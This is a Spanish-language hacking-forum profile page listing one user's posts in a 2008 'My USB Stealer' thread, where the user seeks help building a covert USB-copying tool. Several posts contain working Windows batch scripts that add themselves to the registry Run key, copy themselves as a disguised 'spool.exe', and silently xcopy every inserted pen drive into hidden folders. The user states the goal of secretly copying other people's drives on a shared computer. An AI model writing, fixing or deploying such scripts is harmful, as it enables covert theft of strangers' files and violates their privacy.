elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: My USB Stealer en: 27 Noviembre 2008, 14:51 pm
 joe muchisimas gracias de verdad ya he conseguido todo lo que queria y gracias a vosotros. Solo tengo una preguntilla mas (la ultima de verdad). He probado en un ordenador en el que no tengo privilegios de administrador el programa y he metido mi pen drive. Ha copiado perfectamente todo a una carpeta en c como queria. como ya he visto que funciona he borrado el programa completamente del ordenador. El problema es que ahora quiero borrar los archivos de mi pen drive que se copiaron al ordenador y me salta la ventana de error, de que se estan usando o algo así. He reiniciado el ordenador y he vuelto a iniciar sesion y sigo sin poder borrarlos. Conoceis alguna forma efectiva de borrar carpetas y archivos? He utilizado estos tres programas y me dicen que no pueden borrarlos.
Unlocker
File assesin
Killerbox

Puede ser que ya no pueda borrarlos nunca a no ser que se formatee el ordenador?. Os digo que no tengo privilegios de administrador y por si eso influyera he pasado la carpeta de c donde se copio todo a mis documentos porque en mis documentos si puedo borrar cosas que copie de mi pen, pero tampoco me deja. Lo que quiero decir es que en el ordenador puedo borrar archivos perfectamente (escepto lo de archivos de programa) con lo que no entiendo porque no me deja borrar estos. Muchas gracias por todo aunque no puedan ayudarme
2  Programación / Scripting / Re: My USB Stealer en: 20 Noviembre 2008, 20:39 pm
gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code:
Código:
@echo off
 
If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha)
 
:betha
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t  REG_SZ /d "C:\z23856\2.exe" /f
goto alpha
 
:alpha
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto echeck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sólo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que quería saber es cual seria el code para que copie sólo la unidad e, He creado este pero no funciona:
Código:
@echo off

If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
Quizas podrías crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\
3  Programación / Scripting / Re: My USB Stealer en: 20 Noviembre 2008, 16:12 pm
guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas:
He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versión este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahí estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que después le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se está usando.
Pregunta: ¿No hay alguna forma de que ese mensaje no salte?
El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo así y hasta que no le doy a finalizar programa no se reinicia el ordenaodr
Pregunta: ¿esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga.

Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ¿así lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automáticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando.

Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicación) sigue copiando archivos de los pen drive que se introduzcan: ¿Como se desinstala esta aplicación completamanete?. Además me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ¿esto esta relacionado no?

Conclusión: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura.
Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ¿como se introduce en el codido que te he puesto?.
Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje.

editado-
perdona si soy pesado pero que deberia eliminar del code para que sólo copiara la unidad g o sólo la e??? He probado combinaciones y no me funciona gracias
4  Programación / Scripting / Re: My USB Stealer en: 19 Noviembre 2008, 16:57 pm
corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informática). Sólo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/
Me encantaría que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ¿lo guardo en un txt con alguna extensión especifica? ¿como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/
Gracias por tu ayuda de verdad

Código:
@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensión .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensión a .ini y tampoco sirve. Es como si no pudiera cambiar la extensión de los archivos del bloc de notas. A mi me suena que antes podía ¿que ha podido pasar? habre cambiado algo de la configuración del ordenador sin querer?. Lo digo porque sino puedo crear la extensión que requiera este programa quizas podrias mandarme un alrchivo con esa extensión. En fin estoy aquí a la expectartiva e impaciente. Gracias y un saludo
5  Programación / Scripting / Re: My USB Stealer en: 18 Noviembre 2008, 20:17 pm
oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias
6  Programación / Scripting / Re: My USB Stealer en: 29 Octubre 2008, 17:34 pm
smart genius tengo un problemilla que no logro entender. hasta ahora todo funcionaba bien pero hoy pasa lo siguiente. Para empezar en la carpeta donde indico que se deben copiar los documentos del pen copia unos archivos muy raros (que no estan en el pen) en plan e-books en ingles y cosas así. No se si puede que recupere información ya borrada del pen (no lo entiendo pero es una posibilidad no?) o si esta copiando archivos de otra carpeta del ordenador. En cualquier caso ha dejado de copiar el contenido del pen. Tiene que ver con algo de la unidad? (a veces la unidad es E y otras F). Yo para instalarlo hice lo siguiente:
-Descomprimi.
-Puse todo en una carpeta.
-Ejecute el archivo USBStealer y lo configure (le indique la carpeta donde copiar y elegi documentos). Le di a iniciar para comprobar y todo bien.
-Cerre USBStealer y cree un acceso directo del archivo USBScan el cual introduje en la carpeta de inicio para que se inicie con windows.

Y ya esta. He cometido algun error? no debería iniciarse con windows el usb scan y copiarlo todo sin que se vea que lo hace?.
Gracias
7  Programación / Scripting / Re: My USB Stealer en: 28 Octubre 2008, 17:53 pm
oye smart genius muchisimas gracias. es justo lo que necesitaba!!. Bueno ya había erdido toda esperanza sobretodo porque no se xq razon ya no puedo acceder al post que cree para conseguir lo que tu me has servido en bandeja.
Esta genial. Lo unico que sólo voy ha usar el ejecutable USBScan que por lo que he visto simplemente al ejecutarlo copia todos los pdf word pps incluso excel a la carpeta donde lo pongo (y voy ha hacer lo del acceso directo en la carpeta inicio).
En realidad el otro archivo USBStealer es mucho mejor pero lo malo es que cuando le das a ocultar deja un simbolito abajo a la derecha.
En fin con el USBScan me basta muchas gracias!!!! eres el mejor
8  Programación / Scripting / Re: My USB Stealer en: 23 Octubre 2008, 12:50 pm
Hola corex
me encanta lo que has creado pero necesito tu ayuda. He creado un post aquí exponiendo mi caso:
http://foro.elhacker.net/hacking_basico/usb_copiador_o_algo_asi_ayuda-t231480.0.html

En cualquier caso te explico. Lo que quiero es un programa muy sencillo que copie la información de un pen drive (word, pdf, pps,) en una carpeta del ordenador. Tu codigo por lo que veo hace exactamente eso pero en mi caso tengo un problema y es que necesito que el codigo se autoejecute él sólo con windows (al iniciar windows) y se mantenga activo todo el tiempo, es decir, que cada vez que alguien inicie sesion y meta un pen drive automaticamente y en silencio se copie todo el contenido en una carpeta y si en la misma sesion otra persona mete otro pen drive también copie su contenido (y bueno que si alguien cierra la sesion y otro abre una nueva y mete su pen drive se copie tambien todo). Sólo que todo esto lo tiene que hacer sin necesidad de que yo lo active o ejecute (tiene que ser completamente automático).

Si vas al post donde explique mi situación veras que averno me ha ayudado mucho pero que la mayoría de las soluciones que me ha dado han tenido sus inconvenientes y en general que yo no se mucho de informatica ni de programar ni nada.
Muchisimas gracias con lo que me puedas ayudar y espero impaciente tu ayuda.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines